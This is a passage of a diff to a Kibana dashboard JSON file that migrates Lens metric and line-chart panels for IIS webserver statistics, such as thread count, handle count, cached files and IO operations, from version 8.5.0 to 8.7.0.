"5b28c920-82fe-4b46-9cb4-3ded30e1003f", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-36bd76ba-75e7-4da3-9b47-1761f2a90360", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "36bd76ba-75e7-4da3-9b47-1761f2a90360": { - "columnOrder": [ - "5b28c920-82fe-4b46-9cb4-3ded30e1003f", - "2498791c-ea82-4bb4-b12b-0034cb09e964", - "2498791c-ea82-4bb4-b12b-0034cb09e964X0", - "2498791c-ea82-4bb4-b12b-0034cb09e964X1" - ], - "columns": { - "2498791c-ea82-4bb4-b12b-0034cb09e964": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.process.thread_count))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.process.thread_count))", - "isFormulaBroken": false - }, - "references": [ - "2498791c-ea82-4bb4-b12b-0034cb09e964X1" - ], - "scale": "ratio" - }, - "2498791c-ea82-4bb4-b12b-0034cb09e964X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.thread_count: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.thread_count))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.thread_count" - }, - "2498791c-ea82-4bb4-b12b-0034cb09e964X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.thread_count))", - "operationType": "overall_max", - "references": [ - "2498791c-ea82-4bb4-b12b-0034cb09e964X0" - ], - "scale": "ratio" - }, - "5b28c920-82fe-4b46-9cb4-3ded30e1003f": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.thread_count: *" - }, - "isBucketed": false, - "label": "Thread Count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.thread_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#16A5A5", - "layerId": "36bd76ba-75e7-4da3-9b47-1761f2a90360", - "layerType": "data", - "maxAccessor": "2498791c-ea82-4bb4-b12b-0034cb09e964", - "metricAccessor": "5b28c920-82fe-4b46-9cb4-3ded30e1003f", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Thread Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 11, + "i": "9acc09af-8176-4625-927d-af97d4b5080b", + "w": 10, + "x": 38, + "y": 0 + }, + "panelIndex": "9acc09af-8176-4625-927d-af97d4b5080b", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-3282c038-29da-4266-a759-0329ac8b34c1", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "3282c038-29da-4266-a759-0329ac8b34c1": { + "columnOrder": [ + "2dd652b7-4f9d-4e4e-8703-a968187ca637", + "1287ef02-3486-46bc-a610-0b84078417c5", + "1287ef02-3486-46bc-a610-0b84078417c5X0", + "1287ef02-3486-46bc-a610-0b84078417c5X1" + ], + "columns": { + "1287ef02-3486-46bc-a610-0b84078417c5": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.process.handle_count))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.process.handle_count))", + "isFormulaBroken": false + }, + "references": [ + "1287ef02-3486-46bc-a610-0b84078417c5X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 11, - "i": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6", - "w": 10, - "x": 28, - "y": 0 - }, - "panelIndex": "8392c4c6-1aed-4e8d-9015-15526bc1ceb6", - "title": "Thread Count", - "type": "lens", - "version": "8.5.0" + "1287ef02-3486-46bc-a610-0b84078417c5X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.handle_count: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.handle_count))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.handle_count" + }, + "1287ef02-3486-46bc-a610-0b84078417c5X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.process.handle_count))", + "operationType": "overall_max", + "references": [ + "1287ef02-3486-46bc-a610-0b84078417c5X0" + ], + "scale": "ratio" + }, + "2dd652b7-4f9d-4e4e-8703-a968187ca637": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.process.handle_count: *" + }, + "isBucketed": false, + "label": "Handle Count", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.handle_count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#653294", + "layerId": "3282c038-29da-4266-a759-0329ac8b34c1", + "layerType": "data", + "maxAccessor": "1287ef02-3486-46bc-a610-0b84078417c5", + "metricAccessor": "2dd652b7-4f9d-4e4e-8703-a968187ca637", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-3282c038-29da-4266-a759-0329ac8b34c1", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "3282c038-29da-4266-a759-0329ac8b34c1": { - "columnOrder": [ - "2dd652b7-4f9d-4e4e-8703-a968187ca637", - "1287ef02-3486-46bc-a610-0b84078417c5", - "1287ef02-3486-46bc-a610-0b84078417c5X0", - "1287ef02-3486-46bc-a610-0b84078417c5X1" - ], - "columns": { - "1287ef02-3486-46bc-a610-0b84078417c5": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.process.handle_count))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.process.handle_count))", - "isFormulaBroken": false - }, - "references": [ - "1287ef02-3486-46bc-a610-0b84078417c5X1" - ], - "scale": "ratio" - }, - "1287ef02-3486-46bc-a610-0b84078417c5X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.handle_count: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.handle_count))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.handle_count" - }, - "1287ef02-3486-46bc-a610-0b84078417c5X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.process.handle_count))", - "operationType": "overall_max", - "references": [ - "1287ef02-3486-46bc-a610-0b84078417c5X0" - ], - "scale": "ratio" - }, - "2dd652b7-4f9d-4e4e-8703-a968187ca637": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.process.handle_count: *" - }, - "isBucketed": false, - "label": "Handle Count", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.handle_count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#653294", - "layerId": "3282c038-29da-4266-a759-0329ac8b34c1", - "layerType": "data", - "maxAccessor": "1287ef02-3486-46bc-a610-0b84078417c5", - "metricAccessor": "2dd652b7-4f9d-4e4e-8703-a968187ca637", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Handle Count" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "de5da809-a2ac-4388-9040-ed6f037c901d", + "w": 5, + "x": 0, + "y": 5 + }, + "panelIndex": "de5da809-a2ac-4388-9040-ed6f037c901d", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-092efddb-12b7-4c7e-b10f-37878ddd82e0", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "092efddb-12b7-4c7e-b10f-37878ddd82e0": { + "columnOrder": [ + "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6", + "5e1bef76-dfce-440d-a4a7-ec293ad19426", + "5e1bef76-dfce-440d-a4a7-ec293ad19426X0", + "5e1bef76-dfce-440d-a4a7-ec293ad19426X1" + ], + "columns": { + "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.current_files_cached: *" + }, + "isBucketed": false, + "label": "Current Files Cached", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.current_files_cached" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 11, - "i": "9acc09af-8176-4625-927d-af97d4b5080b", - "w": 10, - "x": 38, - "y": 0 - }, - "panelIndex": "9acc09af-8176-4625-927d-af97d4b5080b", - "title": "Handle Count", - "type": "lens", - "version": "8.5.0" + "5e1bef76-dfce-440d-a4a7-ec293ad19426": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.current_files_cached))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.current_files_cached))", + "isFormulaBroken": false + }, + "references": [ + "5e1bef76-dfce-440d-a4a7-ec293ad19426X1" + ], + "scale": "ratio" + }, + "5e1bef76-dfce-440d-a4a7-ec293ad19426X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.current_files_cached: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.current_files_cached))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.current_files_cached" + }, + "5e1bef76-dfce-440d-a4a7-ec293ad19426X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.current_files_cached))", + "operationType": "overall_max", + "references": [ + "5e1bef76-dfce-440d-a4a7-ec293ad19426X0" + ], + "scale": "ratio" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#15D3A2", + "layerId": "092efddb-12b7-4c7e-b10f-37878ddd82e0", + "layerType": "data", + "maxAccessor": "5e1bef76-dfce-440d-a4a7-ec293ad19426", + "metricAccessor": "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-092efddb-12b7-4c7e-b10f-37878ddd82e0", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "092efddb-12b7-4c7e-b10f-37878ddd82e0": { - "columnOrder": [ - "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6", - "5e1bef76-dfce-440d-a4a7-ec293ad19426", - "5e1bef76-dfce-440d-a4a7-ec293ad19426X0", - "5e1bef76-dfce-440d-a4a7-ec293ad19426X1" - ], - "columns": { - "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.current_files_cached: *" - }, - "isBucketed": false, - "label": "Current Files Cached", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.current_files_cached" - }, - "5e1bef76-dfce-440d-a4a7-ec293ad19426": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.current_files_cached))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.current_files_cached))", - "isFormulaBroken": false - }, - "references": [ - "5e1bef76-dfce-440d-a4a7-ec293ad19426X1" - ], - "scale": "ratio" - }, - "5e1bef76-dfce-440d-a4a7-ec293ad19426X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.current_files_cached: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.current_files_cached))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.current_files_cached" - }, - "5e1bef76-dfce-440d-a4a7-ec293ad19426X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.current_files_cached))", - "operationType": "overall_max", - "references": [ - "5e1bef76-dfce-440d-a4a7-ec293ad19426X0" - ], - "scale": "ratio" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#15D3A2", - "layerId": "092efddb-12b7-4c7e-b10f-37878ddd82e0", - "layerType": "data", - "maxAccessor": "5e1bef76-dfce-440d-a4a7-ec293ad19426", - "metricAccessor": "2faa1d54-2ba8-4b0a-97e5-59a4ea906cc6", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Current Files Cached" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "a64ca567-3295-4753-9a22-2ce5dcb16a40", + "w": 5, + "x": 5, + "y": 5 + }, + "panelIndex": "a64ca567-3295-4753-9a22-2ce5dcb16a40", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d": { + "columnOrder": [ + "56173f88-30d9-4259-abb2-b52fdd659aa9", + "0728015c-910d-4ef9-bae8-e87778f2c5a0", + "0728015c-910d-4ef9-bae8-e87778f2c5a0X0", + "0728015c-910d-4ef9-bae8-e87778f2c5a0X1" + ], + "columns": { + "0728015c-910d-4ef9-bae8-e87778f2c5a0": { + "dataType": "number", + "isBucketed": false, + "label": "overall_max(last_value(iis.webserver.cache.total_files_cached))", + "operationType": "formula", + "params": { + "formula": "overall_max(last_value(iis.webserver.cache.total_files_cached))", + "isFormulaBroken": false + }, + "references": [ + "0728015c-910d-4ef9-bae8-e87778f2c5a0X1" + ], + "scale": "ratio" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" - }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 9, - "i": "de5da809-a2ac-4388-9040-ed6f037c901d", - "w": 5, - "x": 0, - "y": 5 - }, - "panelIndex": "de5da809-a2ac-4388-9040-ed6f037c901d", - "title": "Current Files Cached", - "type": "lens", - "version": "8.5.0" + "0728015c-910d-4ef9-bae8-e87778f2c5a0X0": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.total_files_cached: *" + }, + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.total_files_cached))", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.total_files_cached" + }, + "0728015c-910d-4ef9-bae8-e87778f2c5a0X1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of overall_max(last_value(iis.webserver.cache.total_files_cached))", + "operationType": "overall_max", + "references": [ + "0728015c-910d-4ef9-bae8-e87778f2c5a0X0" + ], + "scale": "ratio" + }, + "56173f88-30d9-4259-abb2-b52fdd659aa9": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "iis.webserver.cache.total_files_cached: *" + }, + "isBucketed": false, + "label": "Total Files Cached", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "iis.webserver.cache.total_files_cached" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "color": "#15A2D3", + "layerId": "7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", + "layerType": "data", + "maxAccessor": "0728015c-910d-4ef9-bae8-e87778f2c5a0", + "metricAccessor": "56173f88-30d9-4259-abb2-b52fdd659aa9", + "progressDirection": "horizontal" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d": { - "columnOrder": [ - "56173f88-30d9-4259-abb2-b52fdd659aa9", - "0728015c-910d-4ef9-bae8-e87778f2c5a0", - "0728015c-910d-4ef9-bae8-e87778f2c5a0X0", - "0728015c-910d-4ef9-bae8-e87778f2c5a0X1" - ], - "columns": { - "0728015c-910d-4ef9-bae8-e87778f2c5a0": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.total_files_cached))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.total_files_cached))", - "isFormulaBroken": false - }, - "references": [ - "0728015c-910d-4ef9-bae8-e87778f2c5a0X1" - ], - "scale": "ratio" - }, - "0728015c-910d-4ef9-bae8-e87778f2c5a0X0": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.total_files_cached: *" - }, - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.total_files_cached))", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.total_files_cached" - }, - "0728015c-910d-4ef9-bae8-e87778f2c5a0X1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of overall_max(last_value(iis.webserver.cache.total_files_cached))", - "operationType": "overall_max", - "references": [ - "0728015c-910d-4ef9-bae8-e87778f2c5a0X0" - ], - "scale": "ratio" - }, - "56173f88-30d9-4259-abb2-b52fdd659aa9": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "iis.webserver.cache.total_files_cached: *" - }, - "isBucketed": false, - "label": "Total Files Cached", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "iis.webserver.cache.total_files_cached" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "color": "#15A2D3", - "layerId": "7731c03d-8a7e-4d3e-bdf2-8e4f676daa4d", - "layerType": "data", - "maxAccessor": "0728015c-910d-4ef9-bae8-e87778f2c5a0", - "metricAccessor": "56173f88-30d9-4259-abb2-b52fdd659aa9", - "progressDirection": "horizontal" - } + "title": "", + "type": "lens", + "visualizationType": "lnsMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total Files Cached" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "c805cba0-cce2-4c3a-8626-492958427932", + "w": 38, + "x": 10, + "y": 11 + }, + "panelIndex": "c805cba0-cce2-4c3a-8626-492958427932", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-53550c84-3d37-4bfe-9059-5cc839edce4c", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d281f47d-1e36-4ab1-be8c-5f6d11e38479", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "53550c84-3d37-4bfe-9059-5cc839edce4c": { + "columnOrder": [ + "90c65dab-0b07-48bf-8c3a-c8d64037f66b", + "b602b162-ab23-4b52-87b7-48580e710e04" + ], + "columns": { + "90c65dab-0b07-48bf-8c3a-c8d64037f66b": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "b602b162-ab23-4b52-87b7-48580e710e04": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IO Write Operations/s", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.io_write_operations_per_sec" + } + }, + "incompleteColumns": {} }, - "enhancements": {}, - "hidePanelTitles": true + "d281f47d-1e36-4ab1-be8c-5f6d11e38479": { + "columnOrder": [ + "6fc74322-ff38-45fd-94bd-04e683578e20", + "ca48fc8d-6ced-44a4-ada8-78faa367cba4" + ], + "columns": { + "6fc74322-ff38-45fd-94bd-04e683578e20": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "ca48fc8d-6ced-44a4-ada8-78faa367cba4": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "IO Read Operations/s", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1, + "suffix": "/s" + } + } + }, + "scale": "ratio", + "sourceField": "iis.webserver.process.io_read_operations_per_sec" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 9, - "i": "a64ca567-3295-4753-9a22-2ce5dcb16a40", - "w": 5, - "x": 5, - "y": 5 + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "a64ca567-3295-4753-9a22-2ce5dcb16a40", - "title": "Total Files Cached", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-53550c84-3d37-4bfe-9059-5cc839edce4c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d281f47d-1e36-4ab1-be8c-5f6d11e38479", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "53550c84-3d37-4bfe-9059-5cc839edce4c": { - "columnOrder": [ - "90c65dab-0b07-48bf-8c3a-c8d64037f66b", - "b602b162-ab23-4b52-87b7-48580e710e04" - ], - "columns": { - "90c65dab-0b07-48bf-8c3a-c8d64037f66b": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "b602b162-ab23-4b52-87b7-48580e710e04": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "IO Write Operations/s", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.io_write_operations_per_sec" - } - }, - "incompleteColumns": {} - }, - "d281f47d-1e36-4ab1-be8c-5f6d11e38479": { - "columnOrder": [ - "6fc74322-ff38-45fd-94bd-04e683578e20", - "ca48fc8d-6ced-44a4-ada8-78faa367cba4" - ], - "columns": { - "6fc74322-ff38-45fd-94bd-04e683578e20": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "ca48fc8d-6ced-44a4-ada8-78faa367cba4": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "IO Read Operations/s", - "operationType": "average", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1, - "suffix": "/s" - } - } - }, - "scale": "ratio", - "sourceField": "iis.webserver.process.io_read_operations_per_sec" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "ca48fc8d-6ced-44a4-ada8-78faa367cba4" - ], - "layerId": "d281f47d-1e36-4ab1-be8c-5f6d11e38479", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "6fc74322-ff38-45fd-94bd-04e683578e20", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(252,196,0,1)", - "forAccessor": "ca48fc8d-6ced-44a4-ada8-78faa367cba4" - } - ] - }, - { - "accessors": [ - "b602b162-ab23-4b52-87b7-48580e710e04" - ], - "layerId": "53550c84-3d37-4bfe-9059-5cc839edce4c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "xAccessor": "90c65dab-0b07-48bf-8c3a-c8d64037f66b", - "yConfig": [ - { - "axisMode": "left", - "color": "#68BC00", - "forAccessor": "b602b162-ab23-4b52-87b7-48580e710e04" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "ca48fc8d-6ced-44a4-ada8-78faa367cba4" + ], + "layerId": "d281f47d-1e36-4ab1-be8c-5f6d11e38479", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" + }, + "seriesType": "line", + "xAccessor": "6fc74322-ff38-45fd-94bd-04e683578e20", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(252,196,0,1)", + "forAccessor": "ca48fc8d-6ced-44a4-ada8-78faa367cba4" + } + ] + }, + { + "accessors": [ + "b602b162-ab23-4b52-87b7-48580e710e04" + ], + "layerId": "53550c84-3d37-4bfe-9059-5cc839edce4c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false + "seriesType": "line", + "xAccessor": "90c65dab-0b07-48bf-8c3a-c8d64037f66b", + "yConfig": [ + { + "axisMode": "left", + "color": "#68BC00", + "forAccessor": "b602b162-ab23-4b52-87b7-48580e710e04" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true }, - "gridData": { - "h": 12, - "i": "c805cba0-cce2-4c3a-8626-492958427932", - "w": 38, - "x": 10, - "y": 11 + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "c805cba0-cce2-4c3a-8626-492958427932", - "title": "IO Operations", - "type": "lens", - "version": "8.5.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "7d311655-e7c4-4eeb-9ab3-626e6e8ed9dd": { - "columnOrder": [ - "f65e7ff2-ff89-43cb-96ab-1f8a5ff7a0ec", - "cff61a8f-0ede-4904-b9b0-835bf244ef48", - "cff61a8f-0ede-4904-b9b0-835bf244ef48X0", - "cff61a8f-0ede-4904-b9b0-835bf244ef48X1" - ], - "columns": { - "cff61a8f-0ede-4904-b9b0-835bf244ef48": { - "dataType": "number", - "isBucketed": false, - "label": "overall_max(last_value(iis.webserver.cache.current_uris_cached))", - "operationType": "formula", - "params": { - "formula": "overall_max(last_value(iis.webserver.cache.current_uris_cached))", - "isFormulaBroken": false - }, - "references": [ - 